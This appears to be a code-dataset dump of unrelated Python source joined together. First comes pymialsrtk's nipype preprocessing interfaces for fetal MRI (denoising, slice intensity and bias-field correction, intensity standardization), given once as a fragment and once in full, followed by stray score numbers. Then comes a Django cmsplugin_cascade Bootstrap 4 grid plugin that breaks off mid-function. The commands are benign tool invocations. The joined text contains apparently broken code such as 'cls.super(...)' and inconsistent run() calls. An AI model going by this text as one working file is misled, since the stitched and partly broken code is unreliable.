outputs['out_file'] = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_postfix, ext)))
return outputs
class MultipleMialsrtkCorrectSliceIntensityInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
input_images = InputMultiPath(File(desc='files to be corrected for intensity', mandatory = True))
input_masks = InputMultiPath(File(desc='mask of files to be corrected for intensity', mandatory = False))
out_postfix = traits.Str("_csi", usedefault=True)
class MultipleMialsrtkCorrectSliceIntensityOutputSpec(TraitedSpec):
output_images = OutputMultiPath(File())
class MultipleMialsrtkCorrectSliceIntensity(BaseInterface):
input_spec = MultipleMialsrtkCorrectSliceIntensityInputSpec
output_spec = MultipleMialsrtkCorrectSliceIntensityOutputSpec
def _run_interface(self, runtime):
for input_image, input_mask in zip(self.inputs.input_images,self.inputs.input_masks):
ax = MialsrtkCorrectSliceIntensity(bids_dir = self.inputs.bids_dir, in_file = input_image, in_mask = input_mask, out_postfix=self.inputs.out_postfix)
ax.run()
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs['output_images'] = glob(os.path.abspath("*.nii.gz"))
return outputs
#
## Slice by slice N4 bias field correction
#
class MialsrtkSliceBySliceN4BiasFieldCorrectionInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
in_file = File(desc='Input image',mandatory=True)
in_mask = File(desc='Input mask',mandatory=True)
out_im_postfix = traits.Str("_sliceN4corr", usedefault=True)
out_fld_postfix = traits.Str("_sliceN4field", usedefault=True)
class MialsrtkSliceBySliceN4BiasFieldCorrectionOutputSpec(TraitedSpec):
out_im_file = File(desc='Corrected slice by slice from N4 bias field')
out_fld_file = File(desc='slice by slice N4 bias field')
class MialsrtkSliceBySliceN4BiasFieldCorrection(BaseInterface):
input_spec = MialsrtkSliceBySliceN4BiasFieldCorrectionInputSpec
output_spec = MialsrtkSliceBySliceN4BiasFieldCorrectionOutputSpec
def _run_interface(self, runtime):
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
out_im_file = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_im_postfix, ext)))
out_fld_file = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_fld_postfix, ext)))
cmd = 'mialsrtkSliceBySliceN4BiasFieldCorrection "{}" "{}" "{}" "{}"'.format(self.inputs.in_file, self.inputs.in_mask, out_im_file, out_fld_file)
try:
print('... cmd: {}'.format(cmd))
run(self, cmd, env={}, cwd=os.path.abspath(self.inputs.bids_dir))
except:
print('Failed')
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
outputs['out_im_file'] = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_im_postfix, ext)))
outputs['out_fld_file'] = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_fld_postfix, ext)))
return outputs
class MultipleMialsrtkSliceBySliceN4BiasFieldCorrectionInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
input_images = InputMultiPath(File(desc='files to be corrected for intensity', mandatory = True))
input_masks = InputMultiPath(File(desc='mask of files to be corrected for intensity', mandatory = True))
out_im_postfix = traits.Str("_sliceN4corr", usedefault=True)
out_fld_postfix = traits.Str("_sliceN4field", usedefault=True)
class MultipleMialsrtkSliceBySliceN4BiasFieldCorrectionOutputSpec(TraitedSpec):
output_images = OutputMultiPath(File())
output_fields = OutputMultiPath(File())
class MultipleMialsrtkSliceBySliceN4BiasFieldCorrection(BaseInterface):
input_spec = MultipleMialsrtkSliceBySliceN4BiasFieldCorrectionInputSpec
output_spec = MultipleMialsrtkSliceBySliceN4BiasFieldCorrectionOutputSpec
def _run_interface(self, runtime):
for input_image, input_mask in zip(self.inputs.input_images,self.inputs.input_masks):
ax = MialsrtkSliceBySliceN4BiasFieldCorrection(bids_dir = self.inputs.bids_dir, in_file = input_image, in_mask = input_mask, out_im_postfix=self.inputs.out_im_postfix, out_fld_postfix=self.inputs.out_fld_postfix)
ax.run()
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs['output_images'] = glob(os.path.abspath("*_sliceN4corr.nii.gz"))
outputs['output_fields'] = glob(os.path.abspath("*_sliceN4field.nii.gz"))
return outputs
#
## Intensity standardization
#
class MialsrtkIntensityStandardizationInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
in_file = File(desc='Input image',mandatory=True)
out_postfix = traits.Str("_ist", usedefault=True)
in_max = traits.Float(usedefault=False)
class MialsrtkIntensityStandardizationOutputSpec(TraitedSpec):
out_file = File(desc='Intensities standardized')
class MialsrtkIntensityStandardization(BaseInterface):
input_spec = MialsrtkIntensityStandardizationInputSpec
output_spec = MialsrtkIntensityStandardizationOutputSpec
def _run_interface(self, runtime):
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
out_file = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_postfix, ext)))
if self.inputs.in_max:
cmd = 'mialsrtkIntensityStandardization --input "{}" --output "{}" --max "{}"'.format(self.inputs.in_file, out_file,self.inputs.in_max)
else:
cmd = 'mialsrtkIntensityStandardization --input "{}" --output "{}"'.format(self.inputs.in_file, out_file)
try:
print('... cmd: {}'.format(cmd))
run(self, cmd, env={}, cwd=os.path.abspath(self.inputs.bids_dir))
except:
print('Failed')
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
outputs['out_file'] = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_postfix, ext)))
return outputs
class MultipleMialsrtkIntensityStandardizationInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
input_images = InputMultiPath(File(desc='files to be corrected for intensity', mandatory = True))
out_postfix = traits.Str("_ist", usedefault=True)
in_max = traits.Float(usedefault=False)
class MultipleMialsrtkIntensityStandardizationOutputSpec(TraitedSpec):
output_images = OutputMultiPath(File())
class MultipleMialsrtkIntensityStandardization(BaseInterface):
input_spec = MultipleMialsrtkIntensityStandardizationInputSpec
output_spec = MultipleMialsrtkIntensityStandardizationOutputSpec
def _run_interface(self, runtime):
for input_image in self.inputs.input_images:
print("input_image", input_image)
if self.inputs.in_max:
ax = MialsrtkIntensityStandardization(bids_dir = self.inputs.bids_dir, in_file = input_image, out_postfix=self.inputs.out_postfix, in_max=self.inputs.in_max)
else:
ax = MialsrtkIntensityStandardization(bids_dir = self.inputs.bids_dir, in_file = input_image, out_postfix=self.inputs.out_postfix)
ax.run()
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs['output_images'] = glob(os.path.abspath("*.nii.gz"))
return outputs | pymialsrtk/interfaces/preprocess.py | import os
from glob import glob
from traits.api import *
import nibabel as nib
from nipype.utils.filemanip import split_filename
from nipype.interfaces.base import traits, isdefined, CommandLine, CommandLineInputSpec,\
TraitedSpec, File, InputMultiPath, OutputMultiPath, BaseInterface, BaseInterfaceInputSpec
from pymialsrtk.interfaces.utils import run
#
## NLM denoising
#
class BtkNLMDenoisingInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
in_file = File(desc='Input image',mandatory=True)
in_mask = File(desc='Input mask',mandatory=False)
out_postfix = traits.Str("_nlm", usedefault=True)
weight = traits.Float(0.1,desc='NLM weight (0.1 by default)')
class BtkNLMDenoisingOutputSpec(TraitedSpec):
out_file = File(desc='Denoised image')
class BtkNLMDenoising(BaseInterface):
input_spec = BtkNLMDenoisingInputSpec
output_spec = BtkNLMDenoisingOutputSpec
def _run_interface(self, runtime):
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
#Version from MIAL/mialsuperresolutiontoolkit with no docker
#out_file = os.path.join(self.inputs.bids_dir, ''.join((name, self.inputs.out_postfix, ext)))
out_file = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_postfix, ext)))
uid = os.getuid()
gid = os.getgid()
cmd = []
cmd.append("docker run --rm -u {}:{}".format(uid,gid))
cmd.append("--volumes-from sinapp_nlmdenoise")
cmd.append("sebastientourbier/mialsuperresolutiontoolkit btkNLMDenoising")
cmd.append("-i {} -o {} -b {}".format(self.inputs.in_file,out_file,self.inputs.weight))
if self.inputs.in_mask:
cmd.append("-m {}".format(self.inputs.in_mask))
try:
print('... cmd: {}'.format(cmd))
p = run(' '.join(cmd), env={}, cwd=os.path.abspath(self.inputs.bids_dir))
print(p)
except:
print('Failed')
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
#Version from MIAL/mialsuperresolutiontoolkit with no docker
#outputs['out_file'] = os.path.join(self.inputs.bids_dir, ''.join((name, self.inputs.out_postfix, ext)))
outputs['out_file'] = os.path.join(os.getcwd(), ''.join((name, self.inputs.out_postfix, ext)))
return outputs
class MultipleBtkNLMDenoisingInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
input_images = InputMultiPath(File(desc='files to be denoised', mandatory = True))
input_masks = InputMultiPath(File(desc='mask of files to be denoised', mandatory = False))
weight = traits.Float(0.1)
out_postfix = traits.Str("_nlm", usedefault=True)
class MultipleBtkNLMDenoisingOutputSpec(TraitedSpec):
output_images = OutputMultiPath(File())
class MultipleBtkNLMDenoising(BaseInterface):
input_spec = MultipleBtkNLMDenoisingInputSpec
output_spec = MultipleBtkNLMDenoisingOutputSpec
def _run_interface(self, runtime):
if len(self.inputs.input_masks)>0:
for input_image, input_mask in zip(self.inputs.input_images,self.inputs.input_masks):
ax = BtkNLMDenoising(bids_dir = self.inputs.bids_dir, in_file = input_image, in_mask = input_mask, out_postfix=self.inputs.out_postfix, weight = self.inputs.weight)
ax.run()
else:
for input_image in self.inputs.input_images:
ax = BtkNLMDenoising(bids_dir = self.inputs.bids_dir, in_file = input_image, out_postfix=self.inputs.out_postfix, weight = self.inputs.weight)
ax.run()
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs['output_images'] = glob(os.path.abspath("*.nii.gz"))
return outputs
#
## Slice intensity correction
#
class MialsrtkCorrectSliceIntensityInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
in_file = File(desc='Input image',mandatory=True)
in_mask = File(desc='Input mask',mandatory=False)
out_postfix = traits.Str("_csi", usedefault=True)
class MialsrtkCorrectSliceIntensityOutputSpec(TraitedSpec):
out_file = File(desc='Corrected slice intensities')
class MialsrtkCorrectSliceIntensity(BaseInterface):
input_spec = MialsrtkCorrectSliceIntensityInputSpec
output_spec = MialsrtkCorrectSliceIntensityOutputSpec
def _run_interface(self, runtime):
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
out_file = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_postfix, ext)))
cmd = 'mialsrtkCorrectSliceIntensity "{}" "{}" "{}"'.format(self.inputs.in_file,self.inputs.in_mask,out_file)
try:
print('... cmd: {}'.format(cmd))
run(self, cmd, env={}, cwd=os.path.abspath(self.inputs.bids_dir))
except:
print('Failed')
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
outputs['out_file'] = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_postfix, ext)))
return outputs
class MultipleMialsrtkCorrectSliceIntensityInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
input_images = InputMultiPath(File(desc='files to be corrected for intensity', mandatory = True))
input_masks = InputMultiPath(File(desc='mask of files to be corrected for intensity', mandatory = False))
out_postfix = traits.Str("_csi", usedefault=True)
class MultipleMialsrtkCorrectSliceIntensityOutputSpec(TraitedSpec):
output_images = OutputMultiPath(File())
class MultipleMialsrtkCorrectSliceIntensity(BaseInterface):
input_spec = MultipleMialsrtkCorrectSliceIntensityInputSpec
output_spec = MultipleMialsrtkCorrectSliceIntensityOutputSpec
def _run_interface(self, runtime):
for input_image, input_mask in zip(self.inputs.input_images,self.inputs.input_masks):
ax = MialsrtkCorrectSliceIntensity(bids_dir = self.inputs.bids_dir, in_file = input_image, in_mask = input_mask, out_postfix=self.inputs.out_postfix)
ax.run()
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs['output_images'] = glob(os.path.abspath("*.nii.gz"))
return outputs
#
## Slice by slice N4 bias field correction
#
class MialsrtkSliceBySliceN4BiasFieldCorrectionInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
in_file = File(desc='Input image',mandatory=True)
in_mask = File(desc='Input mask',mandatory=True)
out_im_postfix = traits.Str("_sliceN4corr", usedefault=True)
out_fld_postfix = traits.Str("_sliceN4field", usedefault=True)
class MialsrtkSliceBySliceN4BiasFieldCorrectionOutputSpec(TraitedSpec):
out_im_file = File(desc='Corrected slice by slice from N4 bias field')
out_fld_file = File(desc='slice by slice N4 bias field')
class MialsrtkSliceBySliceN4BiasFieldCorrection(BaseInterface):
input_spec = MialsrtkSliceBySliceN4BiasFieldCorrectionInputSpec
output_spec = MialsrtkSliceBySliceN4BiasFieldCorrectionOutputSpec
def _run_interface(self, runtime):
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
out_im_file = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_im_postfix, ext)))
out_fld_file = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_fld_postfix, ext)))
cmd = 'mialsrtkSliceBySliceN4BiasFieldCorrection "{}" "{}" "{}" "{}"'.format(self.inputs.in_file, self.inputs.in_mask, out_im_file, out_fld_file)
try:
print('... cmd: {}'.format(cmd))
run(self, cmd, env={}, cwd=os.path.abspath(self.inputs.bids_dir))
except:
print('Failed')
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
outputs['out_im_file'] = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_im_postfix, ext)))
outputs['out_fld_file'] = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_fld_postfix, ext)))
return outputs
class MultipleMialsrtkSliceBySliceN4BiasFieldCorrectionInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
input_images = InputMultiPath(File(desc='files to be corrected for intensity', mandatory = True))
input_masks = InputMultiPath(File(desc='mask of files to be corrected for intensity', mandatory = True))
out_im_postfix = traits.Str("_sliceN4corr", usedefault=True)
out_fld_postfix = traits.Str("_sliceN4field", usedefault=True)
class MultipleMialsrtkSliceBySliceN4BiasFieldCorrectionOutputSpec(TraitedSpec):
output_images = OutputMultiPath(File())
output_fields = OutputMultiPath(File())
class MultipleMialsrtkSliceBySliceN4BiasFieldCorrection(BaseInterface):
input_spec = MultipleMialsrtkSliceBySliceN4BiasFieldCorrectionInputSpec
output_spec = MultipleMialsrtkSliceBySliceN4BiasFieldCorrectionOutputSpec
def _run_interface(self, runtime):
for input_image, input_mask in zip(self.inputs.input_images,self.inputs.input_masks):
ax = MialsrtkSliceBySliceN4BiasFieldCorrection(bids_dir = self.inputs.bids_dir, in_file = input_image, in_mask = input_mask, out_im_postfix=self.inputs.out_im_postfix, out_fld_postfix=self.inputs.out_fld_postfix)
ax.run()
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs['output_images'] = glob(os.path.abspath("*_sliceN4corr.nii.gz"))
outputs['output_fields'] = glob(os.path.abspath("*_sliceN4field.nii.gz"))
return outputs
#
## Intensity standardization
#
class MialsrtkIntensityStandardizationInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
in_file = File(desc='Input image',mandatory=True)
out_postfix = traits.Str("_ist", usedefault=True)
in_max = traits.Float(usedefault=False)
class MialsrtkIntensityStandardizationOutputSpec(TraitedSpec):
out_file = File(desc='Intensities standardized')
class MialsrtkIntensityStandardization(BaseInterface):
input_spec = MialsrtkIntensityStandardizationInputSpec
output_spec = MialsrtkIntensityStandardizationOutputSpec
def _run_interface(self, runtime):
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
out_file = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_postfix, ext)))
if self.inputs.in_max:
cmd = 'mialsrtkIntensityStandardization --input "{}" --output "{}" --max "{}"'.format(self.inputs.in_file, out_file,self.inputs.in_max)
else:
cmd = 'mialsrtkIntensityStandardization --input "{}" --output "{}"'.format(self.inputs.in_file, out_file)
try:
print('... cmd: {}'.format(cmd))
run(self, cmd, env={}, cwd=os.path.abspath(self.inputs.bids_dir))
except:
print('Failed')
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
outputs['out_file'] = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_postfix, ext)))
return outputs
class MultipleMialsrtkIntensityStandardizationInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
input_images = InputMultiPath(File(desc='files to be corrected for intensity', mandatory = True))
out_postfix = traits.Str("_ist", usedefault=True)
in_max = traits.Float(usedefault=False)
class MultipleMialsrtkIntensityStandardizationOutputSpec(TraitedSpec):
output_images = OutputMultiPath(File())
class MultipleMialsrtkIntensityStandardization(BaseInterface):
input_spec = MultipleMialsrtkIntensityStandardizationInputSpec
output_spec = MultipleMialsrtkIntensityStandardizationOutputSpec
def _run_interface(self, runtime):
for input_image in self.inputs.input_images:
print("input_image", input_image)
if self.inputs.in_max:
ax = MialsrtkIntensityStandardization(bids_dir = self.inputs.bids_dir, in_file = input_image, out_postfix=self.inputs.out_postfix, in_max=self.inputs.in_max)
else:
ax = MialsrtkIntensityStandardization(bids_dir = self.inputs.bids_dir, in_file = input_image, out_postfix=self.inputs.out_postfix)
ax.run()
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs['output_images'] = glob(os.path.abspath("*.nii.gz"))
return outputs | 0.323915 | 0.160069 |
from __future__ import unicode_literals
from django.core.exceptions import ValidationError
from django.db.models import Q
from django.forms import widgets
from django.forms.fields import ChoiceField
from django.forms.models import ModelForm
from django.utils.html import format_html
from django.utils.encoding import force_text
from django.utils.translation import ungettext_lazy, ugettext_lazy as _
from cms.plugin_pool import plugin_pool
from cmsplugin_cascade import app_settings
from cmsplugin_cascade.forms import ManageChildrenFormMixin
from cmsplugin_cascade.fields import GlossaryField
from .plugin_base import BootstrapPluginBase
from . import grid
def get_widget_choices():
breakpoints = app_settings.CMSPLUGIN_CASCADE['bootstrap4']['fluid_bounds']
widget_choices = []
for index, (bp, bound) in enumerate(breakpoints.items()):
if index == 0:
widget_choices.append((bp.name, "{} (<{:.1f}px)".format(bp.label, bound.max)))
elif index == len(breakpoints) - 1:
widget_choices.append((bp.name, "{} (≥{:.1f}px)".format(bp.label, bound.min)))
else:
widget_choices.append((bp.name, "{} (≥{:.1f}px and <{:.1f}px)".format(bp.label, bound.min, bound.max)))
return widget_choices
class ContainerBreakpointsWidget(widgets.CheckboxSelectMultiple):
template_name = 'cascade/forms/widgets/container_breakpoints.html'
def render(self, name, value, attrs=None, renderer=None):
attrs = dict(attrs, version=4)
return super(ContainerBreakpointsWidget, self).render(name, value, attrs, renderer)
class BootstrapContainerForm(ModelForm):
"""
Form class to validate the container.
"""
def clean_glossary(self):
if len(self.cleaned_data['glossary']['breakpoints']) == 0:
raise ValidationError(_("At least one breakpoint must be selected."))
return self.cleaned_data['glossary']
class ContainerGridMixin(object):
def get_grid_instance(self):
fluid = self.glossary.get('fluid', False)
try:
breakpoints = [getattr(grid.Breakpoint, bp) for bp in self.glossary['breakpoints']]
except KeyError:
breakpoints = [bp for bp in grid.Breakpoint]
if fluid:
bounds = dict((bp, grid.fluid_bounds[bp]) for bp in breakpoints)
else:
bounds = dict((bp, grid.default_bounds[bp]) for bp in breakpoints)
return grid.Bootstrap4Container(bounds=bounds)
class BootstrapContainerPlugin(BootstrapPluginBase):
name = _("Container")
parent_classes = None
require_parent = False
form = BootstrapContainerForm
glossary_variables = ['container_max_widths', 'media_queries']
glossary_field_order = ['breakpoints', 'fluid']
model_mixins = (ContainerGridMixin,)
breakpoints = GlossaryField(
ContainerBreakpointsWidget(choices=get_widget_choices()),
label=_('Available Breakpoints'),
initial=[bp.name for bp in app_settings.CMSPLUGIN_CASCADE['bootstrap4']['fluid_bounds'].keys()],
help_text=_("Supported display widths for Bootstrap's grid system."),
)
fluid = GlossaryField(
widgets.CheckboxInput(),
label=_('Fluid Container'), initial=False,
help_text=_("Changing your outermost '.container' to '.container-fluid'.")
)
@classmethod
def get_identifier(cls, obj):
identifier = super(BootstrapContainerPlugin, cls).get_identifier(obj)
breakpoints = obj.glossary.get('breakpoints')
content = obj.glossary.get('fluid') and '(fluid) ' or ''
if breakpoints:
breakpoints = app_settings.CMSPLUGIN_CASCADE['bootstrap4']['fluid_bounds']
devices = ', '.join([force_text(bp.label) for bp in breakpoints])
content = _("{0}for {1}").format(content, devices)
return format_html('{0}{1}', identifier, content)
@classmethod
def get_css_classes(cls, obj):
css_classes = cls.super(BootstrapContainerPlugin, cls).get_css_classes(obj)
if obj.glossary.get('fluid'):
css_classes.append('container-fluid')
else:
css_classes.append('container')
return css_classes
def save_model(self, request, obj, form, change):
super(BootstrapContainerPlugin, self).save_model(request, obj, form, change)
obj.sanitize_children()
plugin_pool.register_plugin(BootstrapContainerPlugin)
class BootstrapRowForm(ManageChildrenFormMixin, ModelForm):
"""
Form class to add non-materialized field to count the number of children.
"""
ROW_NUM_COLUMNS = [1, 2, 3, 4, 6, 12]
num_children = ChoiceField(
choices=[(i, ungettext_lazy('{0} column', '{0} columns', i).format(i)) for i in ROW_NUM_COLUMNS],
initial=3, label=_('Columns'),
help_text=_('Number of columns to be created with this row.'))
class RowGridMixin(object):
def get_grid_instance(self):
row = grid.Bootstrap4Row()
query = Q(plugin_type='BootstrapContainerPlugin') | Q(plugin_type='BootstrapColumnPlugin') \
| Q(plugin_type='BootstrapJumbotronPlugin')
container = self.get_ancestors().order_by('depth').filter(query).last().get_bound_plugin().get_grid_instance()
container.add_row(row)
return row
class BootstrapRowPlugin(BootstrapPluginBase):
name = _("Row")
default_css_class = 'row'
parent_classes = ['BootstrapContainerPlugin', 'BootstrapColumnPlugin', 'BootstrapJumbotronPlugin']
form = BootstrapRowForm
fields = ['num_children', 'glossary']
model_mixins = (RowGridMixin,)
@classmethod
def get_identifier(cls, obj):
identifier = super(BootstrapRowPlugin, cls).get_identifier(obj)
num_cols = obj.get_num_children()
content = ungettext_lazy("with {0} column", "with {0} columns", num_cols).format(num_cols)
return format_html('{0}{1}', identifier, content)
def save_model(self, request, obj, form, change):
wanted_children = int(form.cleaned_data.get('num_children'))
super(BootstrapRowPlugin, self).save_model(request, obj, form, change)
child_glossary = {'xs-column-width': 'col'}
self.extend_children(obj, wanted_children, BootstrapColumnPlugin, child_glossary=child_glossary)
plugin_pool.register_plugin(BootstrapRowPlugin)
class ColumnGridMixin(object):
valid_keys = ['xs-column-width', 'sm-column-width', 'md-column-width', 'lg-column-width', 'xs-column-width',
'xs-column-offset', 'sm-column-offset', 'md-column-offset', 'lg-column-offset', 'xs-column-offset']
def get_grid_instance(self):
column = None
query = Q(plugin_type='BootstrapRowPlugin')
row_obj = self.get_ancestors().order_by('depth').filter(query).last().get_bound_plugin()
# column_siblings = row_obj.get_descendants().order_by('depth').filter(plugin_type='BootstrapColumnPlugin')
row = row_obj.get_grid_instance()
for column_sibling in self.get_siblings():
classes = [val for key, val in column_sibling.get_bound_plugin().glossary.items()
if key in self.valid_keys and val]
if column_sibling.pk == self.pk:
column = grid.Bootstrap4Column(classes)
row.add_column(column)
else:
row.add_column(grid.Bootstrap4Column(classes))
return column
class BootstrapColumnPlugin(BootstrapPluginBase):
name = _("Column")
parent_classes = ('BootstrapRowPlugin',)
child_classes = ('BootstrapJumbotronPlugin',)
alien_child_classes = True
default_css_attributes = [fmt.format(bp.name) for bp in grid.Breakpoint
for fmt in ('{}-column-width', '{}-column-offset', '{}-column-ordering', '{}-responsive-utils')]
glossary_variables = ['container_max_widths']
model_mixins = (ColumnGridMixin,)
def get_form(self, request, obj=None, **kwargs):
def choose_help_text(*phrases):
bounds = 'fluid_bounds' if container.glossary.get('fluid') else 'default_bounds'
bs4_breakpoints = app_settings.CMSPLUGIN_CASCADE['bootstrap4'][bounds]
if last:
return phrases[0].format(bs4_breakpoints[last].max)
elif len(breakpoints) > 1:
return phrases[1].format(bs4_breakpoints[first].min)
else:
return phrases[2]
if 'parent' in self._cms_initial_attributes:
container=self._cms_initial_attributes['parent'].get_ancestors().order_by('depth').last().get_bound_plugin()
else:
containers=obj.get_ancestors().filter(plugin_type='BootstrapContainerPlugin')
if containers:
container=containers.order_by('depth').last().get_bound_plugin()
else:
jumbotrons=obj.get_ancestors().filter(plugin_type='BootstrapJumbotronPlugin')
container=jumbotrons.order_by('depth').last().get_bound_plugin()
breakpoints = container.glossary['breakpoints']
glossary_fields = []
units = [ungettext_lazy("{} unit", "{} units", i).format(i) for i in range(0, 13)]
for bp in breakpoints:
try:
last = getattr(grid.Breakpoint, breakpoints[breakpoints.index(bp) + 1])
except IndexError:
last = None
finally:
first = getattr(grid.Breakpoint, bp)
devices = ', '.join([force_text(b.label) for b in grid.Breakpoint.range(first, last)])
if bp == 'xs':
choices = [('col', _("Flex column"))]
choices.extend(('col-{}'.format(i), _("{} fixed column").format(units[i])) for i in range(1, 13))
choices.append(('col-auto', _("Auto column")))
else:
choices = [('col-{}'.format(bp), _("Flex column"))]
choices.extend(('col-{}-{}'.format(bp, i), _("{} fixed column").format(units[i])) for i in range(1, 13))
choices.append(('col-{}-auto'.format(bp), _("Auto column")))
if breakpoints.index(bp) == 0:
# first breakpoint
glossary_fields.append(GlossaryField(
widgets.Select(choices=choices),
label=_("Column width for {}").format(devices),
name='{}-column-width'.format(bp),
initial='col-{}-12'.format(bp),
help_text=choose_help_text(
_("Column width for devices narrower than {:.1f} pixels."),
_("Column width for devices wider than {:.1f} pixels."),
_("Column width for all devices."),
)
))
else:
# wider breakpoints may inherit from next narrower ones
choices.insert(0, ('', _("Inherit from above")))
glossary_fields.append(GlossaryField(
widgets.Select(choices=choices),
label=_("Column width for {}").format(devices),
name='{}-column-width'.format(bp),
initial='',
help_text=choose_help_text(
_("Override column width for devices narrower than {:.1f} pixels."),
_("Override column width for devices wider than {:.1f} pixels."),
_("Override column width for all devices."),
)
))
# handle offset
if breakpoints.index(bp) == 0:
choices = [('', _("No offset"))]
offset_range = range(1, 13)
else:
choices = [('', _("Inherit from above"))]
offset_range = range(0, 13)
if bp == 'xs':
choices.extend(('offset-{}'.format(i), units[i]) for i in offset_range)
else:
choices.extend(('offset-{}-{}'.format(bp, i), units[i]) for i in offset_range)
label = _("Offset for {}").format(devices)
help_text = choose_help_text(
_("Offset width for devices narrower than {:.1f} pixels."),
_("Offset width for devices wider than {:.1f} pixels."),
_("Offset width for all devices.")
)
glossary_fields.append(GlossaryField(
widgets.Select(choices=choices),
label=label,
name='{}-column-offset'.format(bp),
help_text=help_text))
# handle column reordering
choices = [('', _("No reordering"))]
if bp == 'xs':
choices.extend(('order-{}'.format(i), _("Reorder by {}").format(units[i])) for i in range(1, 13))
else:
choices.extend(('order-{}-{}'.format(bp, i), _("Reorder by {}").format(units[i])) for i in range(1, 13))
label = _("Reordering for {}").format(devices)
help_text = choose_help_text(
_("Reordering for devices narrower than {:.1f} pixels."),
_("Reordering for devices wider than {:.1f} pixels."),
_("Reordering for all devices.")
)
glossary_fields.append(GlossaryField(
widgets.Select(choices=choices),
label=label,
name='{}-column-ordering'.format(bp),
help_text=help_text))
# handle responsive utilities
choices = [('', _("Default")), ('visible-{}'.format(bp), _("Visible")), ('hidden-{}'.format(bp), _("Hidden"))]
label = _("Responsive utilities for {}").format(devices)
help_text = choose_help_text(
_("Utility classes for showing and hiding content by devices narrower than {:.1f} pixels."),
_("Utility classes for showing and hiding content by devices wider than {:.1f} pixels."),
_("Utility classes for showing and hiding content for all devices.")
)
glossary_fields.append(GlossaryField(
widgets.RadioSelect(choices=choices),
label=label,
name='{}-responsive-utils'.format(bp),
initial='',
help_text=help_text))
glossary_fields = [
glossary_fields[i + len(glossary_fields) // len(breakpoints) * j]
for i in range(0, len(glossary_fields) // len(breakpoints))
for j in range(0, len(breakpoints))
]
kwargs.update(glossary_fields=glossary_fields)
return super(BootstrapColumnPlugin, self).get_form(request, obj, **kwargs)
def save_model(self, request, obj, form, change):
super(BootstrapColumnPlugin, self).save_model(request, obj, form, change)
obj.sanitize_children()
@classmethod
def sanitize_model(cls, obj):
sanitized = super(BootstrapColumnPlugin, cls).sanitize_model(obj)
return sanitized
@classmethod
def get_identifier(cls, obj):
identifier = super(BootstrapColumnPlugin, cls).get_identifier(obj)
glossary = obj.get_complete_glossary()
widths = []
for bp in glossary.get('breakpoints', []):
